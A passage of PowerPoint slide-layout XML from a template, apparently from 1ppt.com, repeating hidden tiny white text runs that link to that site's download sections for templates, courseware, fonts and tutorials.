              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout243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43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43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43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4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44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44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44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44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44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44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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout244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44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44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44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4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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout245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45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45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45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45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45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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
